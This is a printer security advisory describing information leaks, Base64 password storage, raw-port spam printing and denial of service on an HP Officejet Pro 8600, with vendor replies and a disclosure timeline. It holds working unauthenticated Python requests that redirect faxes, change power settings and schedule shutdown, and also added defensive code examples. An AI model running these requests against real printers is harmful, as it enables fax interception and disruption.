How I hacked a HP Printer

WS201511 – How I hacked a HP Printer
by David Sopas @dsopas
www.websegura.net

Description:

I had the opportunity to test some printers from the HP Officejet Pro series.
I decided to test it and did a scan on the local IP of this Wi-Fi printer.
Note: I would like to point out that all installation steps were performed following the HP manual.

Information disclosure:

I ran nmap against the local IP of the HP printer and got curious results.
In my opinion, too much information is disclosed to any local user connected to the same network.

Port 80/tcp (HTTP) shows us the complete model and the serial number of the printer:

HP Officejet Pro 8600 printer http config (Serial CN1CTxxxxxxxxxx)

Port 161/udp (SNMP) shows us the MAC address, Ethernet speed and traffic stats:

MAC address: xx:xx:xx:xx:xx:xx (Hewlett-Packard Company)
Type: ethernetCsmacd Speed: 10 Mbps
Status: up
Traffic stats: 1.33 Mb sent, 2.39 Mb received

SNMP (queried with the netstat script) also shows us the established connections to the printer and the system uptime:

TCP 192.168.1.89:9110 192.168.1.65:30645
TCP 192.168.1.89:9111 192.168.1.65:70
TCP 192.168.1.89:47485 15.201.141.250:5222
System uptime: 0 days, 5:11:07.91 (1866791 timeticks)

With the Nmap script smb-os-discovery, a user can also learn the OS running on the printer using the “guest” account:

OS: VxWorks (NQ 4.32)

This information should be limited and restricted, because it can be used to launch other types of attacks.

HP reported:

The information noted as well as other information is provided by design. For example, by nature printers need to be discoverable so that clients can find them and connect to the right one, and this involves making some information that uniquely identifies the printer available.

HP continues to evaluate and balance the needs between providing important information for end users and limiting access to such information.

Admin panel access and weak password encryption:

Another major issue is that the admin panel has no password by default, which in my opinion is a bad security policy. On first connection to the admin panel it should ask the user to set a password.
Also, if you add a new password or change it to another one, the password is stored merely Base64-encoded. Base64 is reversible encoding, not a safe encryption method.
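Added example, not code from the advisory or from HP: what a Base64-only password store amounts to, beside a salted PBKDF2 store from which the password cannot be recovered. The function names and the sample password are assumptions made for this example.

```python
import base64
import hashlib
import hmac
import os

def weak_store(password: str) -> str:
    """What the advisory observed: the stored value is only Base64-encoded."""
    return base64.b64encode(password.encode()).decode()

def weak_recover(stored: str) -> str:
    """Base64 is reversible: anyone who can read the stored value gets the password back."""
    return base64.b64decode(stored).decode()

def strong_store(password: str, salt: bytes = None, iterations: int = 200_000) -> str:
    """Salted PBKDF2-HMAC-SHA256. The stored string reveals neither the password nor a reusable token."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"

def strong_verify(password: str, stored: str) -> bool:
    """Recompute the derived key and compare in constant time; malformed records never verify."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != "pbkdf2_sha256":
        return False
    _, iterations, salt_hex, dk_hex = parts
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    # Constructed sample password for the demonstration.
    weak = weak_store("Pr1nter!")
    print("base64 store:", weak, "-> recovered:", weak_recover(weak))
    strong = strong_store("Pr1nter!")
    print("pbkdf2 store:", strong, "-> verifies:", strong_verify("Pr1nter!", strong))
```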

HP reported:

We do not think that a default password adds any security because it will become well known like default router passwords. It would be an inconvenience for novice users who don’t know the default password, yet it adds no meaningful security.
We support basic authentication over HTTPS.

Spam Printing and Denial of Service:

From my point of view, the worst security issue I found was the P9100 service being active by default (it can also be activated without admin access). In the admin panel HP says that this method supports printing by raw IP on TCP port 9100 and that it is used by HP software (HP Standard Port). What I found next was also with nmap: three open ports, 9100, 9101 and 9102.

If you connect with telnet to one of these ports, you can print whatever you type in the terminal. Keep in mind that while you are connected to the printer via telnet, it shows “Printing…” on the HP printer panel and the printer stays busy until you close the telnet session. That prevents other users from using the printer.

The computer that connects via telnet doesn’t even need to have the printer installed or any access to the printer; it only needs access to the local network.

I already know from searching on Google that many companies have issues with spam printing via the Internet. Maybe these affected companies aren’t filtering or closing some naughty ports on the printer?

This security issue (spam printing) can be very costly to a company, because someone can waste its resources: ink and paper. It can even damage the printer if someone writes a script that simply sends requests to that port and keeps printing and filling the printer queue.

HP reported:

The design for printing via Windows Standard TCP/IP Port Monitor requires port 9100 to be open by default. Other ports, such as 9101 and 9102 are used for diagnostic and troubleshooting purposes and provide no useful data.

Modify options without permission (the admin panel is protected with a password):

I wrote some Python scripts that allow anyone on the local network to change printer options without a password.

Change Power Save Timeout

import http.client

# Local IP of the tested printer; no credentials are needed for this PUT.
connection = http.client.HTTPConnection('192.168.1.89', 80)
# The original header value "Content-Type: text/xml" produced a malformed header; the value is just the media type.
headers = {"Content-Type": "text/xml", "Accept": "*/*"}
body_content = '<prdcfgdyn2:ProductConfigDyn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:prdcfgdyn2="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16" xmlns:prdcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16 ../schemas/ledm2/ProductConfigDyn.xsd                               http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05 ../schemas/ProductConfigDyn.xsd                               http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../schemas/dd/DataDictionaryMasterLEDM.xsd"><prdcfgdyn2:ProductSettings><dd:PowerSaveTimeout>5minutes</dd:PowerSaveTimeout></prdcfgdyn2:ProductSettings></prdcfgdyn2:ProductConfigDyn>'
# Request path only; the host is already known from the connection.
connection.request('PUT', '/DevMgmt/ProductConfigDyn.xml', body_content, headers)
result = connection.getresponse()
print(result.status, result.reason)
connection.close()

Redirect FAX to another number

import http.client

# Local IP of the tested printer; no credentials are needed for this PUT.
connection = http.client.HTTPConnection('192.168.1.89', 80)
# Header value corrected to the bare media type (the original sent "Content-Type: text/xml" as the value).
headers = {"Content-Type": "text/xml", "Accept": "*/*"}
# Forwarding number and schedule window are the sample values used in the test.
body_content = '<faxcfgdyn:FaxConfigDyn xmlns:faxcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/faxconfigdyn/2009/03/03" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:fax="http://www.hp.com/schemas/imaging/con/fax/2008/06/13" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/faxconfigdyn/2009/03/03 ../schemas/FaxConfigDyn.xsd"><faxcfgdyn:ReceiveSettings><dd:FaxForwardingNumber>111111111</dd:FaxForwardingNumber><fax:ReceiveForward>forward</fax:ReceiveForward><faxcfgdyn:ForwardScheduleSettings><faxcfgdyn:ForwardStartTime><dd:TimeStamp>2015-02-26T00:00:00.0Z</dd:TimeStamp></faxcfgdyn:ForwardStartTime><faxcfgdyn:ForwardStopTime><dd:TimeStamp>2015-02-28T00:00:00.0Z</dd:TimeStamp></faxcfgdyn:ForwardStopTime></faxcfgdyn:ForwardScheduleSettings></faxcfgdyn:ReceiveSettings></faxcfgdyn:FaxConfigDyn>'
connection.request('PUT', '/DevMgmt/FaxConfigDyn.xml', body_content, headers)
result = connection.getresponse()
print(result.status, result.reason)
connection.close()

Scheduled printer off

import http.client

# Local IP of the tested printer; no credentials are needed for this PUT.
connection = http.client.HTTPConnection('192.168.1.89', 80)
# Header value corrected to the bare media type (the original sent "Content-Type: text/xml" as the value).
headers = {"Content-Type": "text/xml", "Accept": "*/*"}
# Enables automatic power-off at 19:00 on Sundays and leaves scheduled power-on disabled.
body_content = '<prdcfgdyn2:ProductConfigDyn xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:dd="http://www.hp.com/schemas/imaging/con/dictionaries/1.0/" xmlns:prdcfgdyn2="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16" xmlns:prdcfgdyn="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05" xsi:schemaLocation="http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2009/03/16 ../schemas/ledm2/ProductConfigDyn.xsd                               http://www.hp.com/schemas/imaging/con/ledm/productconfigdyn/2007/11/05 ../schemas/ProductConfigDyn.xsd                               http://www.hp.com/schemas/imaging/con/dictionaries/1.0/ ../schemas/dd/DataDictionaryMasterLEDM.xsd"><prdcfgdyn2:ProductSettings><dd:ScheduledOffScheduledOnTime><dd:ScheduledOff><dd:AutoOffTimeSetting>enabled</dd:AutoOffTimeSetting><dd:AutoOffTimeAndDaySetting><dd:AutoOffTimeValue>19:00:00</dd:AutoOffTimeValue><dd:DaysOfWeek>sunday</dd:DaysOfWeek></dd:AutoOffTimeAndDaySetting><dd:Deferred>false</dd:Deferred></dd:ScheduledOff><dd:ScheduledOn><dd:AutoOnTimeSetting>disabled</dd:AutoOnTimeSetting><dd:AutoOnTimeAndDaySetting><dd:AutoOnTimeValue>00:00:00</dd:AutoOnTimeValue></dd:AutoOnTimeAndDaySetting></dd:ScheduledOn></dd:ScheduledOffScheduledOnTime></prdcfgdyn2:ProductSettings></prdcfgdyn2:ProductConfigDyn>'
connection.request('PUT', '/DevMgmt/ProductConfigDyn.xml', body_content, headers)
result = connection.getresponse()
print(result.status, result.reason)
connection.close()

And there are many more settings that can be manipulated this way.
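Added example, not from the advisory or from HP, covering both the raw-port printing issue and the unauthenticated /DevMgmt/ configuration writes: a small audit that runs over constructed connection-log lines and flags raw-print connections from hosts other than the print server, sessions that hold port 9100 open (the “Printing…” lock-up described above), and configuration PUTs from a host that is not the admin workstation. The printer address, the allowed hosts, the log format and the sample lines are all assumptions made for this example.

```python
import re

# Assumptions for this example (not values from the advisory): which hosts may use
# the raw-print ports and which host is expected to write printer configuration.
PRINTER = "192.168.1.89"
PRINT_SERVERS = {"192.168.1.65"}   # only host allowed to talk to port 9100
ADMIN_HOSTS = {"192.168.1.10"}     # only host expected to PUT to /DevMgmt/
RAW_PRINT_PORTS = {9100, 9101, 9102}
LONG_SESSION_SECS = 300            # a session held open keeps the printer busy

# Constructed log format: "<ts> <src> -> <dst>:<dport> <proto> [duration=<n>s] [<METHOD> <path>]"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>[\d.]+) -> (?P<dst>[\d.]+):(?P<dport>\d+) (?P<proto>\w+)"
    r"(?: duration=(?P<dur>\d+)s)?(?: (?P<method>[A-Z]+) (?P<path>\S+))?$"
)

def parse(line):
    """Parse one log line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["dport"] = int(ev["dport"])
    ev["dur"] = int(ev["dur"]) if ev["dur"] else 0
    return ev

def audit(lines):
    """Return (rule, source host, detail) findings for traffic aimed at the printer."""
    findings = []
    for line in lines:
        ev = parse(line)
        if ev is None or ev["dst"] != PRINTER:
            continue
        src, port = ev["src"], ev["dport"]
        if port in RAW_PRINT_PORTS and src not in PRINT_SERVERS:
            findings.append(("raw-print-from-unauthorized-host", src, f"port {port}"))
        if port in RAW_PRINT_PORTS and ev["dur"] >= LONG_SESSION_SECS:
            findings.append(("raw-print-session-held-open", src, f"{ev['dur']}s"))
        if ev["method"] == "PUT" and ev["path"].startswith("/DevMgmt/") and src not in ADMIN_HOSTS:
            findings.append(("config-write-from-non-admin-host", src, ev["path"]))
    return findings

# Constructed sample log: one normal print job, one stranger holding 9100 open,
# one config PUT from that stranger, one legitimate admin PUT, one harmless GET.
SAMPLE_LOG = [
    "2015-02-20T10:00:01Z 192.168.1.65 -> 192.168.1.89:9100 tcp duration=4s",
    "2015-02-20T10:03:10Z 192.168.1.77 -> 192.168.1.89:9100 tcp duration=843s",
    "2015-02-20T10:05:12Z 192.168.1.77 -> 192.168.1.89:80 http PUT /DevMgmt/FaxConfigDyn.xml",
    "2015-02-20T10:06:00Z 192.168.1.10 -> 192.168.1.89:80 http PUT /DevMgmt/ProductConfigDyn.xml",
    "2015-02-20T10:07:30Z 192.168.1.77 -> 192.168.1.89:80 http GET /",
]
```

Running audit(SAMPLE_LOG) yields three findings, all against 192.168.1.77; the print server's short job and the admin host's PUT are not reported.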

HP reported:

HP enterprise class printers do not allow any persistent setting changes without the admin password, but printers designed for small teams of users (home consumers and small businesses) do allow less critical persistent settings to be changed without requiring the admin password.
HP has remediated some settings at the user level and recognizes the advantage of password protecting additional settings in our proprietary configuration interface. HP continues to investigate additional security for these interfaces.
(Note: a persistent setting is a global setting that persists across power cycles. This is in contrast to job-specific settings which need to be easily changed as part of each user submitted job.)

I didn’t try other HP models, so I don’t know if any of them have these kinds of issues.

I would like to thank HP for providing their feedback even if they are different from my security perspective. It’s always important to establish a communication between security researchers.

Timeline:

20 Feb 2015 – Reported to HP security
20 Feb 2015 – HP assigned a reference number to this advisory
04 Mar 2015 – HP still working on the issue
01 Apr 2015 – HP replied with the feedback I provided during the full disclosure
15 Apr 2015 – Full disclosure
